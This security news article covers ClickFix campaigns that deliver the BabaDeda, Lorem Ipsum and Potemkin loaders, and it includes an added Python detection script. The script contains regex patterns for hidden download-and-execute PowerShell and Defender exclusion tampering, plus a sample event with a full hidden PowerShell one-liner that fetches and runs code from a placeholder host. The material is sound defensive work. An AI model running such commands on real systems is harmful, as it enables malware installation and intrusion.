Enhancing Malware Distribution: ClickFix Campaigns Introduce New Loaders and Deceptive Update Tactics

Several ClickFix campaigns have been identified by cybersecurity researchers, introducing three distinct malware loaders known as BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. This information has been reported independently by Morphisec, BlueVoyant, and Huntress, respectively.

Reports indicate that attacks linked to BabaDeda Loader, which were observed in April 2026, have specifically targeted educational and financial institutions.

Morphisec researcher Shmuel Uzan highlighted the evolution of BabaDeda Loader, stating, “This new framework keeps that same code genome but expands it into a far more capable loader built for stealth, evasion, and payload flexibility.”

These attacks typically begin with a ClickFix social engineering strategy that tricks users into executing attacker-supplied PowerShell commands to deploy the loader. Subsequently, the loader is utilized to distribute information stealers and remote access trojans (RATs) by incorporating well-known techniques such as hidden PowerShell, in-memory shellcode, DLL side-loading, and external payload storage.

The activity has been connected to BabaDeda, a crypter service initially identified by Morphisec in November 2021 in a campaign targeting cryptocurrency and Web3 sectors. The loader is engineered to profile the host, avoid running on Russian or Belarusian systems, and execute security product-related checks before delivering the main payload.

One of the malware variants distributed through BabaDeda Loader is a .NET backdoor and information stealer with the following capabilities:

  • Collecting detailed system information
  • Discovering installed browser profiles
  • Extracting browser artifacts such as cookies, browsing history, saved credentials, preferences, and local-state encryption keys
  • Traversing directories and selecting files based on configurable rules
  • Reading and exfiltrating file contents
  • Capturing screenshots and displaying information
  • Executing shell commands or external processes and collecting output
  • Transferring data back to the C2 server
  • Using native Windows APIs for process interaction, memory operations, DPAPI access, Restart Manager behavior, and advanced file access

Another attack chain deploys a ZIP archive using DLL side-loading to launch DanaBot and SectopRAT. These attacks stand out for utilizing a staged loader component named Storage Crypter, which retrieves payload materials from external storage-like files.

Morphisec emphasized the stealthy nature of these attacks, stating, “The visible application package appears legitimate, while malicious payloads remain hidden inside externally stored containers and are decoded only moments before execution.”

This discovery underscores the evolution of modern loader frameworks, which have transitioned towards modular structures that separate delivery, storage, execution, and payload deployment into distinct components.

ClickFix Campaign Deploys Lorem Ipsum Loader

Another active campaign leveraging the ClickFix technique utilizes compromised WordPress sites to distribute a new loader and backdoor known as Lorem Ipsum Loader. The compromised websites belong to various sectors, including architecture, legal services, and construction technology.

This shift in delivery methods is a response to Microsoft’s actions against Fox Tempest, a threat actor involved in a malware-signing-as-a-service operation. The new delivery mechanism eliminates code signing entirely.

These attacks signify the adaptability of threat actors in changing their initial access techniques. The Lorem Ipsum ecosystem has been associated with a financially motivated threat actor named Vanilla Tempest, known for deploying ransomware families like Rhysida, BlackCat, Zeppelin, and Quantum Locker.

The attack sequences involving Lorem Ipsum Loader utilize ClickFix-style Edge web browser security update lures to execute a malicious command that downloads a ZIP file and an outdated version of Node.js to deploy JavaScript-based payloads stealthily.

The JavaScript payload acts as a dropper for additional malware components, including a batch script for persistence and a DLL side-loading chain to decode the embedded Lorem Ipsum Loader payload.

BlueVoyant highlighted the backdoor’s functionality, stating, “The Lorem Ipsum chain culminates in handoff to Rapid Brigantine’s established post-exploitation tooling and ultimately to their documented ransomware deployments, primarily Rhysida.”

Potemkin, RMMProject, and EtherRAT Delivered via ClickFix

A sophisticated attack chain in a third campaign involves installing an MSI package that drops the Potemkin loader via an HTML Application (HTA) payload. This loader serves as a conduit for EtherRAT and RMMProject, enabling remote screen control and browser credential theft.

RMMProject includes a task dispatcher mechanism to perform various actions, such as taking screenshots, siphoning browser data, executing Lua scripts, terminating processes, and downloading additional modules at runtime.

Huntress researchers described Potemkin loader as a custom x64 loader designed with a domain generation algorithm to discover its C2 and load follow-on modules in memory. The loader supports various components for victim identification, task polling, DLL execution, and secure C2 communication.

The threat actor behind these attacks reportedly engaged in configuring security exclusions, deploying reverse SOCKS tunnels, conducting reconnaissance, setting up persistent access through Cloudflare tunnels, and spreading EtherRAT across multiple hosts.
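The behaviours reported across the three campaigns (a user pasting a hidden PowerShell one-liner from a ClickFix lure, an outdated Node.js interpreter running JavaScript from a user-writable path, an HTA payload launched during an MSI install, and security exclusions being configured from the command line) can each be expressed as a process-creation rule. The script below is an added example written for this article, not tooling from Morphisec, BlueVoyant or Huntress. The event format (a record with parent image, image and command line, as an endpoint telemetry source would provide) and all sample events are constructed here; the rule names and field names are assumptions. `Add-MpPreference` and `mshta.exe` are the real Defender cmdlet and HTA host respectively.

```python
"""Heuristic triage of process-creation events for the ClickFix patterns in the article.

Added example, not vendor code. Event fields and sample events are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # full path of the parent process (assumed field name)
    image: str          # full path of the created process (assumed field name)
    command_line: str   # command line of the created process (assumed field name)


# Cues of a hidden / download-and-execute PowerShell one-liner of the kind a
# ClickFix lure asks the user to paste into the Run dialog.
HIDDEN_PS = re.compile(
    r"(?i)(-w(indowstyle)?\s+h(idden)?|-enc(odedcommand)?\b|-nop\b|\biex\b"
    r"|invoke-expression|downloadstring|invoke-webrequest|\biwr\b)"
)
# Directories an ordinary user can write to; an interpreter started from here is suspect.
USER_WRITABLE = re.compile(r"(?i)\\(temp|appdata|downloads|public)\\")
# Defender exclusion being added from a command line (Add-MpPreference -Exclusion*).
EXCLUSION_TAMPER = re.compile(r"(?i)add-mppreference\s.*-exclusion")
# HTML Application file passed to the HTA host.
HTA_FILE = re.compile(r"(?i)\.hta\b")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return the names of every rule that fires on one event (empty list if none)."""
    hits = []
    parent = basename(event.parent_image)
    image = basename(event.image)
    cmd = event.command_line
    # Rule 1: explorer.exe (the Run dialog) spawning hidden/obfuscated PowerShell.
    if image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" and HIDDEN_PS.search(cmd):
        hits.append("clickfix_hidden_powershell")
    # Rule 2: Node.js interpreter executing from a user-writable directory.
    if image == "node.exe" and USER_WRITABLE.search(event.image):
        hits.append("node_from_user_writable_path")
    # Rule 3: Defender exclusion configured via command line, whatever the parent.
    if EXCLUSION_TAMPER.search(cmd):
        hits.append("defender_exclusion_tamper")
    # Rule 4: HTA payload executed by mshta.exe.
    if image == "mshta.exe" and HTA_FILE.search(cmd):
        hits.append("hta_execution")
    return hits


def triage_all(events):
    """Map event index -> fired rules, keeping only events with at least one hit."""
    results = {}
    for i, event in enumerate(events):
        hits = triage(event)
        if hits:
            results[i] = hits
    return results


# Constructed sample telemetry; paths, user name and host are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -nop -c "iex (iwr http://example.invalid/verify)"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Users\alice\AppData\Local\Temp\node\node.exe",
              r"node.exe C:\Users\alice\AppData\Local\Temp\update.js"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Add-MpPreference -ExclusionPath C:\\ProgramData\\svc"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\alice\AppData\Local\Temp\setup.hta"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt"),   # benign control event
]

if __name__ == "__main__":
    for idx, rules in triage_all(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].command_line, "->", rules)
```

Each rule is deliberately narrow (Rule 1 requires the explorer.exe parent that the Run-dialog route produces; Rule 2 keys on the interpreter's location rather than its name) so that legitimate administrative PowerShell and developer Node.js installs under Program Files do not fire. In production the regexes would be tuned against the environment's baseline, and Rule 3 should be correlated with the subsequent tunnel or RAT activity the article describes rather than treated as a standalone verdict.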

ClickFix Continues to Persist

ClickFix remains a prevalent technique for targeting Windows and macOS users through fraudulent bot verification screens, delivering malware like Phexia Stealer and HellsUchecker. These campaigns have exploited the interest in artificial intelligence tools to distribute malicious payloads.

Despite efforts to combat such attacks, threat actors continue to adapt, showcasing the enduring effectiveness of ClickFix in exploiting human behavior. Apple has responded to the threat by introducing security alerts in macOS Tahoe 26.4 to caution users against running potentially harmful commands.
